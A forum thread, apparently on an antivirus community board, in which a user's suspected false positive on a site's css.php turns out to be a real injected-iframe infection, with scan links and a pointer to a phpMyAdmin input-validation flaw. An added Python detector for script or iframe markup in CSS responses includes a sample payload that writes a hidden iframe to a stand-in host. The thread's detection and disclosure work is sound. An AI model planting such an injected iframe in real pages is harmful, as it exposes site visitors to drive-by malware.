False Positive -

Hello everyone:

I would like to report a false positive trojan at the following site: p71owners.c0m <(obviously the 0 is supposed to be an o)

Infection Details
URL: hXXp://www.p71owners.com/css.php?styleid
Infection: js:Iframe-CG [Trj]

Please fix this. It's on every page I visit on the site.

Wanted to add: AVG, MSE, and McAfee don't report the site.
If it is infected, can someone tell me what I need to tell the webmaster? He's a very active user of the forums.

INFECTED

VirusTotal - URL scan - p71owners.com/css.php?styleid
http://www.virustotal.com/url-scan/report.html?id=44cb866e2383093aba6da08b39771038-1318883496

VirusTotal - downloaded file scan - p71owners.com/css.php?styleid
http://www.virustotal.com/file-scan/report.html?id=f136f88051845756239294b979b86f64caf05cfceed8eeedfa40eb8e587199db-1318891047

jsunpack says SUSPICIOUS

Wepawet
http://wepawet.iseclab.org/view.php?hash=9be21681712d439a15837e6f826d1194&t=1318891542&type=js

If it is infected, can someone tell me what I need to tell the webmaster? He's a very active user of the forums.
Give him the link to this topic...

Nothing found at http://sitecheck.sucuri.net/scanner/ for the site, image1.

Checked this one hXXp://www.p71owners.com/css.php out at jsunpack, see image2 of what it considers suspicious, looks nondescript to me.

This is the .js file it considers suspect hXXp://www.p71owners.com/clientscript/vbulletin-core.js, but VirusTotal is 0/43 VirusTotal results.

Hello,
this detection is correct.

Can you expand a little more on this detection? Is this a PHP vulnerability being exploited, etc.?

EDIT: I see that VT now has lots of detections on this css.php file, or rather a file purporting to be CSS but just running a script tag, VirusTotal Results page
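The observation above, a file requested as CSS that instead carries a script tag, can be checked on a saved copy of the response. The following is an added example, not part of the original thread; the function name, finding codes and sample bodies are assumptions constructed for illustration:

```python
from html.parser import HTMLParser
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}

class _MarkupFinder(HTMLParser):
    """Collects active HTML elements in a body that should be pure CSS."""
    def __init__(self):
        super().__init__()
        self.hits, self.script_text, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag not in ACTIVE_TAGS:
            return
        a = {k: v or "" for k, v in attrs}
        self.hits.append(("active-tag", tag))
        if tag == "script":
            self._in_script = True
        if tag == "iframe":  # hidden or 1x1 frames are a common injection pattern
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if tiny or "display:none" in style or "visibility:hidden" in style:
                self.hits.append(("hidden-iframe", a.get("src", "")))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # script bodies arrive as raw text, keep them
            self.script_text.append(data)

def audit_css_response(content_type, body):
    """Return (code, detail) findings for a response requested as a stylesheet."""
    findings = []
    mime = content_type.split(";")[0].strip().lower()
    if mime != "text/css":
        findings.append(("content-type", mime))
    finder = _MarkupFinder()
    finder.feed(body)
    finder.close()
    findings.extend(finder.hits)
    # An iframe built by document.write() never appears as a parsed tag.
    if "<iframe" in "".join(finder.script_text).lower():
        findings.append(("script-writes-iframe", ""))
    return findings

# Constructed samples, not taken from the site discussed in this thread.
CLEAN = ".nav > li a { color: #036; }\n"
INJECTED = ("body { margin: 0; }\n<script>document.write('<iframe src=\"http://"
            "example.invalid/in.php\" width=\"1\" height=\"1\"></iframe>');</script>\n")
```

An empty result for `audit_css_response("text/css", CLEAN)` is the expected state; any finding on a stylesheet URL is worth passing to the webmaster along with the saved response.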

Hi DavidR,

The exploit is abusing insufficient input validation of the parameter js_frame. It is fully described here: http://securitate.md/blog/phpmyadmin-3-4-5-full-path-discosure/2011/10/17/
There is also a fix given in that article.
Link-source: securitate.md/blog/ article author and detection by Mihail Ursu,

polonus

Not entirely sure if that is the same, as the file name mentioned is phpmyadmin.css.php, not css.php, unless that is just a path issue.